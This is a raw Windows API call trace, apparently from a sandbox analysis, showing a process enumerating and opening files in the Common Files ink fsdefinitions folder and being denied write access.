[0083.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.763] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce7a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="osknav", cAlternateFileName="")) returned 1 [0083.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0083.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0083.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0083.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0083.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0083.764] AreFileApisANSI () returned 1 [0083.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav", lpUsedDefaultChar=0x0) returned 72 [0083.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0083.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.764] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.764] AreFileApisANSI () returned 1 [0083.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0083.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0083.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 72 [0083.764] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.764] GetLastError () returned 0x5 [0083.764] GetLastError () returned 0x5 [0083.764] SetLastError (dwErrCode=0x5) [0083.764] GetLastError () returned 0x5 [0083.764] SetLastError (dwErrCode=0x5) [0083.764] GetLastError () returned 0x5 [0083.764] SetLastError (dwErrCode=0x5) [0083.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0083.765] AreFileApisANSI () returned 1 [0083.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0083.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0083.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 72 [0083.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.765] GetLastError () returned 0x5 [0083.765] GetLastError () returned 0x5 [0083.765] SetLastError (dwErrCode=0x5) [0083.765] GetLastError () returned 0x5 [0083.765] SetLastError (dwErrCode=0x5) [0083.765] GetLastError () returned 0x5 [0083.765] SetLastError (dwErrCode=0x5) [0083.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0083.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0083.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.765] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0083.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0083.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0083.765] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0083.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0083.766] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78410 [0083.766] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce7a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.766] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknavbase.xml", cAlternateFileName="")) returned 1 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0083.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0083.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81b40 | out: hHeap=0x20000) returned 1 [0083.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.767] AreFileApisANSI () returned 1 [0083.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml", lpUsedDefaultChar=0x0) returned 87 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0083.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.767] AreFileApisANSI () returned 1 [0083.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0083.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x812a0 [0083.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x812a0, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml") returned 87 [0083.768] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.768] GetFileType (hFile=0x340) returned 0x1 [0083.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0083.768] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.768] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.768] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.768] CloseHandle (hObject=0x340) returned 1 [0083.769] AreFileApisANSI () returned 1 [0083.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0083.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81ed8 [0083.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x81ed8, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml") returned 87 [0083.769] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.769] GetLastError () returned 0x5 [0083.769] GetLastError () returned 0x5 [0083.769] SetLastError (dwErrCode=0x5) [0083.769] GetLastError () returned 0x5 [0083.769] SetLastError (dwErrCode=0x5) [0083.769] GetLastError () returned 0x5 [0083.769] SetLastError (dwErrCode=0x5) [0083.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81ed8 | out: hHeap=0x20000) returned 1 [0083.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0083.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.769] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xac, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5a6c0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xac, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Э")) returned 0 [0083.769] FindClose (in: hFindFile=0x78410 | out: hFindFile=0x78410) returned 1 [0083.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0083.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.770] AreFileApisANSI () returned 1 [0083.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml", lpUsedDefaultChar=0x0) returned 76 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0083.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0083.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0083.771] AreFileApisANSI () returned 1 [0083.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85440 [0083.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d268, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml") returned 76 [0083.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.771] GetFileType (hFile=0x42c) returned 0x1 